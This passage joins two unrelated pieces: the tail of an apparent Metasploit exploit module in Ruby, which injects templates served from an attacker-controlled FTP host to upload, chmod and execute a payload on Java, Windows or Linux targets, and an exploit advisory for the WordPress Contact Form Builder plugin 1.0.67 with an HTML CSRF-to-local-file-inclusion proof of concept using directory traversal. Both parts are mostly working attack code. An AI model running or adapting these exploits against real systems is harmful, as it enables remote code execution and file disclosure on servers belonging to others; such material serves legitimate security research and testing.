  inject_template("ftp://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}/#{Rex::Text.rand_text_alpha(5)}upload.vm")
  # The uploaded file is written as data, so it has to be made executable
  # before it (or its copy) can be run.
  @command = "chmod +x #{@fname}"
  inject_template("ftp://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}/#{Rex::Text.rand_text_alpha(5)}exec.vm")
  print_status("Attempting to copy payload to #{new_fname}")
  get_dup_file_code(@fname, new_fname)
  print_status("Attempting to execute #{new_fname}")
  @command = new_fname
  # Short timeout: the exec template waits for the process to exit.
  inject_template("ftp://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}/#{Rex::Text.rand_text_alpha(5)}exec.vm", timeout=5)
end
# Module entry point: starts the embedded FTP server that serves the
# templates, identifies the target OS through the Java "os.name" property,
# verifies it against the selected module target and dispatches to the
# platform-specific routine.
#
# @return [void]
def exploit
  # Random marker used by #wrap and #clear_response to cut the property value
  # out of the rendered page.
  @wrap_marker = Rex::Text.rand_text_alpha(5..10)
  # Start the FTP service
  print_status("Starting the FTP server.")
  start_service
  target_platform = get_target_platform
  if target_platform.nil?
    fail_with(Failure::Unreachable, 'Target did not respond to OS check. Confirm RHOSTS and RPORT, then run "check".')
  else
    print_status("Target being detected as: #{target_platform}")
  end
  unless target_platform_compat?(target_platform)
    fail_with(Failure::BadConfig, 'Selected module target does not match the actual target.')
  end
  # No else branch: a target name matching none of these patterns does
  # nothing and the module returns silently.
  case target.name.downcase
  when /java$/
    exploit_as_java
  when /windows$/
    exploit_as_windows
  when /linux$/
    exploit_as_linux
  end
end
# Surrounds a string with the random wrap marker so its value can later be
# located in a rendered page by #clear_response.
#
# @param string [String] Text to wrap.
# @return [String] marker, newline, string, marker, newline.
def wrap(string)
  [@wrap_marker, "\n", string, @wrap_marker, "\n"].join
end
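# Extracts the text enclosed between two wrap markers from a response body.
#
# The marker is escaped before being interpolated into the pattern, so the
# match cannot be disturbed by regex metacharacters (rand_text_alpha never
# produces any, but the helper no longer depends on that).
#
# @param string [String] Response body to search.
# @return [String, nil] The text between the markers, or nil when the body
#   does not contain a wrapped value.
def clear_response(string)
  marker = Regexp.escape(@wrap_marker.to_s)
  match = string.match(/#{marker}\n(.*)\n#{marker}\n/m)
  match && match[1]
end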
end
# Exploit Title: Contact Form Builder [CSRF → LFI]
# Date: 2019-03-17
# Exploit Author: Panagiotis Vagenas
# Vendor Homepage: http://web-dorado.com/
# Software Link: https://wordpress.org/plugins/contact-form-builder
# Version: 1.0.67
# Tested on: WordPress 5.1.1
Description
-----------
Plugin implements the following AJAX actions:
- `ContactFormMakerPreview`
- `ContactFormmakerwdcaptcha`
- `nopriv_ContactFormmakerwdcaptcha`
- `CFMShortcode`
All of them call the function `contact_form_maker_ajax`. This function
dynamically loads a file defined in `$_GET['action']` or
`$_POST['action']` if the former is not defined. Because of the way
WordPress defines the AJAX action a user could define the plugin action
in the `$_GET['action']` and AJAX action in `$_POST['action']`.
Leveraging that, and the fact that no sanitization is performed on
`$_GET['action']`, a malicious actor can perform a CSRF attack to load a
file using directory traversal, leading to a Local File Inclusion
vulnerability.
PoC
---
```html
<!-- Advisory PoC form: the plugin action travels in the query string while
     the AJAX action is chosen in the POST body, as described above. -->
<form method="post"
action="http://wp-csrf-new.test/wp-admin/admin-ajax.php?action=/../../../../../../index">
<label>AJAX action:
<select name="action">
<option
value="ContactFormMakerPreview">ContactFormMakerPreview</option>
<option
value="ContactFormmakerwdcaptcha">ContactFormmakerwdcaptcha</option>
<option
value="nopriv_ContactFormmakerwdcaptcha">nopriv_ContactFormmakerwdcaptcha</option>
<option value="CFMShortcode">CFMShortcode</option>
</select>
</label>
<button type="submit" value="Submit">Submit</button>
</form>
```